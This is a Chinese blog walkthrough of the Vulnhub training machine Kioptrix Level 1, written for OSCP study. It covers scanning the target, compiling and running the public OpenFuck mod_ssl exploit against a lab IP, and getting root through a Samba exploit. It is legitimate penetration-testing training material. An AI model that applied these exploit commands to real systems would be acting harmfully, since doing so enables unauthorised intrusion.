OSCP备考_0x01_Vulnhub靶机_Kioptrix: Level 1 (#1)

Ethan医生6个月前靶场197


名称说明
靶机下载链接https://www.vulnhub.com/entry/kioptrix-level-1-1,22/
攻击机(kali)ip:192.168.233.168
靶机(CentOS)ip:192.168.233.171


信息收集

使用arp-scan进行扫描查看存在主机

image.png

发现有个 192.168.233.254, 使用nmap进行端口扫描




发现出现mod_ssl有漏洞 搜索漏洞是否有EXP

根據nmap掃描結果是發現有使用mod_ssl/2.8.4,透過Google確定版本漏洞,並且有相關POC可以利用。

image.png

Exploit

根據這個Github的提示,在complie這支poc之前需要先安裝一些libery。

git clone https://github.com/heltonWernik/OpenFuck.git
apt-get install libssl-dev
gcc -o OpenFuck OpenFuck.c -lcrypto
./OpenFuck

基本上就編譯完成了,過程中如果出現warning不要理他,那些東西都是不影響poc執行的,照著Poc裡面的提示就可以把機器打下來了。


image.png

进入后获取的是apache用户

sudo ./OpenFuck 0x6b 192.168.233.171 -c 40

uname -a

Linux kioptrix.level1 2.4.7-10 #1 Thu Sep 6 16:46:36 EDT 2001 i686 unknown




使用SAMBA漏洞

可以抓包查看SAMBA版本号

然后使用searchsploit samba

image.png



然后发现有RCE方法 执行后拿到Root权限

image.png

思路总结

一、主机发现、端口扫描

  • 22(ssh):只能尝试爆破

  • 80(http):优先考虑

  • 111(rpc):放最后

  • 139(NetBIOS/SMB):特定EXP

  • 443(https):优先考虑

  • 1024:动态端口的开始,许多程序并不在乎用哪个端口连接网络,它们请求系统为它们分配下一个闲置端口。

二、服务枚举。

  • Apache 1.3.20

  • Samba 2.2.1a(MSF探测版本)

  • mod_ssl 2.8.4

  • OpenSSL 0.9.6b

三、发现web站点是apache默认页面并无太多有价值信息,则着手从各个服务出发,在对SMB服务进行枚举后发现存在共享,尝试无密码访问却无权浏览文件,则将攻击方向转变为各个服务,通过对公开漏洞进行搜索,并尝试了Samba服务和Apache服务的四个漏洞利用,均拿到了root权限。最后,这台靶机不难但也要做出反思:

  • 对于攻击者而言,一个小小的泄露可能会引起他的攻击兴趣。

  • 思考自己的操作是否会引发重大安全事件(例如严重的溢出)

  • 需要随时盘点获得的信息,并对其进行判断,重要的是思路的拓展和细节的把控,即使走不通的也有其中的尝试和思考。(Apache mod_ssl/Apache-SSL 远程缓冲溢出)






相关文章

OSCP备考_0x25_HackThBox靶机_Linux_OpenAdmin

OSCP备考_0x25_HackThBox靶机_Linux_OpenAdmin

nmap -sCV -p- --min-rate 10000 -T4 -sS 10.129.228.199 (扫描TCP)nmap -sU --top-ports 100 ...

vulnhub靶场之DC:1

vulnhub靶场之DC:1

准备:攻击机:虚拟机kali、本机win11靶机:DC:1,下载地址:https://www.vulnhub.com/entry/dc-1,292/ 一:信息收集arp-scan查看有哪些刚起的IP访...

HTB.OSCP一招网络问题解决

HTB.OSCP一招网络问题解决

刚报考的第二天发现LAB一直断,之后购买VPS 阿里云-新加坡服务器记得需要注意防火墙,使用的协议 如果是TCP就使用TCP UDP就使用UDP下面解决HTB或OSCP的 openvpn都是可以的非常...

OSCP备考_0x20_HackThBox靶机_Linux_Blocky

OSCP备考_0x20_HackThBox靶机_Linux_Blocky

nmap -sCV -p- --min-rate 10000 -T4 -sS 10.129.14.190 (扫描TCP)nmap -sU --top-ports 100 ...

OSCP备考_0x05_Vulnhub靶机_KIOPTRIX:2014 (#5)

OSCP备考_0x05_Vulnhub靶机_KIOPTRIX:2014 (#5)

名称说明靶机下载链接https://www.vulnhub.com/entry/kioptrix-2014-5,62/攻击机(kali)ip:192.168.233.168靶机(CentOS)ip:1...

OSCP备考_0x16_Vulnhub靶机_Matrix: 3

OSCP备考_0x16_Vulnhub靶机_Matrix: 3

名称说明靶机下载链接https://www.vulnhub.com/entry/matrix-3,326/攻击机(kali)ip:192.168.233.168靶机(CentOS)ip:192.168...

发表评论    

◎欢迎参与讨论,请在这里发表您的看法、交流您的观点。